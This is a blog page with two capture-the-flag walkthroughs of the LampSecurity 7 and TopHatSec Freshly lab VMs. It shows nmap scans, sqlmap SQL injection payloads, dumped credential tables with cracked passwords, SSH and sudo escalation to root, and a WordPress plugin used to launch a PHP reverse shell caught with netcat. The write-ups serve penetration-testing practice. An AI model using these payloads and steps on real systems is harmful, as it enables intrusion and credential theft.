Sunday, 21 February 2016

Walkthrough LampSecurity Version 7

CTF series LAMP SECURITY 7 : I have been spending a lot of time trying to improve my hacking skills in order to prepare for my OFFSEC certification challenge. I have been struggling to improve my average time to compromise  a box ( remember i need to do 5 in 24 hours to clear the offsec challenge) so any easy boxes i find along the way are welcome :P . They kinda increase my confidence. Lampsecurity7 seems like one such box. I am glad i pawned it and that too in optimal time (imho since the time can greatly vary depending upon the skill of the person). Thanks to the author for helping me prepare for the exam :-)

Detailed Steps to get root :

An nmap scan of the box reveals a number of open services.

Not shown: 64991 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_ 2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Mad Irish Hacking Academy
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required
|_ Basic realm=SWAT
| http-methods:
|_ Supported Methods: GET POST
|_http-title: 401 Authorization Required
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
10000/tcp open http MiniServ 1.610 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 9A2006C267DE04E262669D821B57EAD1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: MiniServ/1.610
|_http-title: Login to Webmin
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Uptime guess: 49.711 days (since Thu Dec 24 10:56:35 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.5.10-125.el6)
| Computer name: localhost
| NetBIOS computer name:
| Domain name:
| FQDN: localhost
|_ System time: 2016-01-28T10:39:45-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.116.139
view raw gistfile1.txt hosted with ❤ by GitHub


We see a webapplication running on the box. While playing around with the webapplication we notice the /newsletter URL which by adding a ' to the URL we a detailed error message printed out which leads us to believe that the box suffers from sql injection.



We capture the traffic using burp and run sqlmap to see if we can find any interesting databases.

cat sql.file
GET /newsletter&id=1 HTTP/1.1
Host: 192.168.116.139
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pv1evkh5h3rjfajojfdbiqnd72; testing=1; roundcube_sessid=0oo5o02r2217dbff3t53j40j06
Connection: close
view raw gistfile1.txt hosted with ❤ by GitHub


sqlmap -r sql.file --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201602070a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:47:12
........
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.116.139:80/newsletter&id=1 AND 6207=6207
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT 2804 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(2804=2804,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xbRE)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://192.168.116.139:80/newsletter&id=-9786 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176707671,0x6645506a52417641745455654c44514f5554746b42486e4f496a434c6b6a5372506f766a696a4f4f,0x716a767a71),NULL-- -
---
[11:47:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[11:47:14] [INFO] fetching database names
[11:47:14] [INFO] the SQL query used returns 4 entries
[11:47:14] [INFO] resumed: information_schema
[11:47:14] [INFO] resumed: mysql
[11:47:14] [INFO] resumed: roundcube
[11:47:14] [INFO] resumed: website
available databases [4]:
[*] information_schema
[*] mysql
[*] roundcube
[*] website
view raw gistfile1.txt hosted with ❤ by GitHub


Sqlmap is able to dump a few databases for us namely i) information_schema
ii) mysql iii) roundcube  & iv) website

We try to dump the contents of these databases using the sqlmap -D parameter 

sqlmap -r sql.file --dbs -D website --dump
....
....
[11:47:43] [INFO] fetching tables for database: 'website'
[11:47:43] [INFO] the SQL query used returns 9 entries
[11:47:43] [INFO] resumed: contact
[11:47:43] [INFO] resumed: documents
[11:47:43] [INFO] resumed: hits
[11:47:43] [INFO] resumed: log
[11:47:43] [INFO] resumed: newsletter
[11:47:43] [INFO] resumed: payment
[11:47:43] [INFO] resumed: trainings
[11:47:43] [INFO] resumed: trainings_x_users
[11:47:43] [INFO] resumed: users
[11:47:43] [INFO] fetching columns for table 'hits' in database 'website'
....
....
Database: website
Table: users
[13 entries]
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
| user_id | profile | username | realname | password | last_login |
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
| 4 | <blank> | john@localhost.localdomain | John Durham | 0d9ff2a4396d6939f80ffe09b1280ee1 | NULL |
| 5 | <blank> | alice@localhost.localdomain | Alice Wonder | 2146bf95e8929874fc63d54f50f1d2e3 | NULL |
| 6 | <blank> | ruby@localhost.localdomain | Ruby Spinster | 9f80ec37f8313728ef3e2f218c79aa23 | NULL |
| 7 | <blank> | leon@localhost.localdomain | Leon Parnetta | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) | NULL |
| 8 | <blank> | julia@localhost.localdomain | Julia Fields | ed2539fe892d2c52c42a440354e8e3d5 (madrid) | NULL |
| 9 | <blank> | michael@localhost.localdomain | Michael Saint | 9c42a1346e333a770904b2a2b37fa7d3 (somepassword) | NULL |
| 10 | <blank> | bruce@localhost.localdomain | Bruce Pottricks | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | NULL |
| 11 | <blank> | neil@localhost.localdomain | Neil Felstein | 4773408d5358875b3764db552a29ca61 | NULL |
| 12 | <blank> | charles@localhost.localdomain | Charles Adams | b2a97bcecbd9336b98d59d9324dae5cf | NULL |
| 36 | <blank> | foo@bar.com | <blank> | 4cb9c8a8048fd02294477fcb1a41191a (changeme) | NULL |
| 114 | <blank> | <blank> | <blank> | d41d8cd98f00b204e9800998ecf8427e () | NULL |
| 113 | <blank> | test@nowhere.com | <blank> | 098f6bcd4621d373cade4e832627b4f6 (test) | NULL |
| 3 | Brian is our technical brains behind the operations and a chief trainer. | brian@localhost.localdomain | Brian Hershel | e22f07b17f98e0d9d364584ced0e3c18 | 2012-12-19 11:30:54 |
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
view raw gistfile1.txt hosted with ❤ by GitHub


Sqlmap is able to dump various tables in the website database. We keep dumping the contents of these various tables till we see that the `users` table dumps a list of possible database users and their credentials (sqlmap helps us crack these as well . its so amazing and powerful !) . Luckily we see that the passwords are not salted.

We know that the box is running a ssh service so we try to login to the box hoping that at least some user would have reused his ssh credentials.

We ssh into the box and seems like julia is in the sudo users list and we can immediately escalate our priv to root :-) Simple and easy

ssh julia@192.168.116.139
julia@192.168.116.139's password:
Last login: Thu Jan 28 17:58:01 2016 from 192.168.116.137
[julia@localhost ~]$ id
uid=506(julia) gid=506(julia) groups=506(julia),10(wheel),511(sales) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[julia@localhost ~]$ sudo /bin/bash
[sudo] password for julia:
[root@localhost julia]#
view raw gistfile1.txt hosted with ❤ by GitHub



Posted by at 7 comments:

Sunday, 7 February 2016

Walkthrough TopHatSec Freshly

Mission `Freshly` VM : I downloaded the virtual machine hosted at https://www.vulnhub.com/entry/tophatsec-freshly,118/  . There are a couple of challenges from TopHatSec and I would like to try them both. Well for starters here is `Freshly` :-)

Detailed steps for getting root : 

A nmap scan of the box reveals that ports 80,443 and 8080 are publically accessible  on the box.


We quickly run both nikto and dirbuster against the webserver. We see that the VM is running a login application on port 80 while on the other ports it is  running a wordpress blog.


Login prompt 
Wordpress blog
We also see an installation of  phpmyadmin on the webserver. We try the default credentials but dont succeed. Since there is a phpmydamin running on the box we guess that there may be mysql server running at the backend as well. Hence we try mysql authentication bypass by using a wronguser' or 1=1 LIMIT 1;# as username and junk as password. However we are not successful. Inspite of this its worth the effort to run sqlmap against the server to see if it can pick up some injection points either in the username or password fields.

sqlmap -o -u http://192.168.116.135/login.php --forms --dbs
view raw gistfile1.txt hosted with ❤ by GitHub
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: user=VXNQ' AND (SELECT * FROM (SELECT(SLEEP(5)))BNMi) AND 'EOBB'='EOBB&password=&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[05:29:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
view raw gistfile1.txt hosted with ❤ by GitHub


Sqlmap tells us that the `user` parameter of the login form is sucesptibel to a mysql injection vulnerabilty. It readily exploits this vulnerability for us to give us a complete dump of the database when we use the --dump sqlmap option.


sqlmap -o -u http://192.168.116.135/login.php --forms --dump --dbs
....
....
....
05:54:23] [INFO] resumed: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080
view raw gistfile1.txt hosted with ❤ by GitHub

Excellent! now we can see that there are a total of 7 databases in the database. We must check out the interesting ones especially login, phpmyadmin, users and wordpress8080.

1) TABLE LOGIN
05:53:38] [INFO] analyzing table dump for possible password hashes
Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir |
+----------+-----------+
2) TABLE wordpress8080
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
3) TABLE users
[06:03:42] [WARNING] database 'users' appears to be empty
[06:03:42] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
[06:03:50] [CRITICAL] unable to retrieve the tables in database 'users'
4) TABLE phpmyadmin
Database: phpmyadmin
Table: pma_table_info
[0 entries]
+---------+------------+---------------+
| db_name | table_name | display_field |
+---------+------------+---------------+
+---------+------------+---------------+
Database: phpmyadmin
Table: pma_relation
[0 entries]
+-----------+------------+--------------+--------------+---------------+---------------+
| master_db | foreign_db | master_table | master_field | foreign_table | foreign_field |
+-----------+------------+--------------+--------------+---------------+---------------+
+-----------+------------+--------------+--------------+---------------+---------------+
[WARNING] table 'pma_table_uiprefs' in database 'phpmyadmin' appears to be empty
Database: phpmyadmin
Table: pma_table_uiprefs
[0 entries]
+-------+---------+----------+------------+-------------+
| prefs | db_name | username | table_name | last_update |
+-------+---------+----------+------------+-------------+
+-------+---------+----------+------------+-------------+
Seems the rest of the tables of the phpmyadmin database are empty as well .
view raw gistfile1.txt hosted with ❤ by GitHub


It seems that the table dump for the wordpress8080 database contains the admin password for the wordpress blog.  We try to login to the wordpress blog via the credentials and we are successful!


Once we have admin credentails on the wordpress getting a shell on the box is extremely simple. By default wordpress will not allow any php content to be run from the wordpress articles/posts. However since we have admin privs on the wordpress we can install a plugin called Exec-php to allow php code to run in the wordpress pages.

We install the plugin to our wordpress installation and then follow the instructions at https://wordpress.org/plugins/exec-php/installation/ to run php code in the article body. Once the simple php hello world example works we use the php-reverse-shell script available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell . We set up a netcat listener and sure enough we get our shell :-)


nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.116.128] from (UNKNOWN) [192.168.116.135] 57118
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
02:30:03 up 3:21, 0 users, load average: 4.19, 4.26, 4.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/home/user$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/home/user$ cat /etc/issue
cat /etc/issue
Ubuntu 14.04.1 LTS \n \l
view raw gistfile1.txt hosted with ❤ by GitHub

There we have our flag. A fun challenge indeed :-) 
Posted by at No comments:
Subscribe to: Posts (Atom)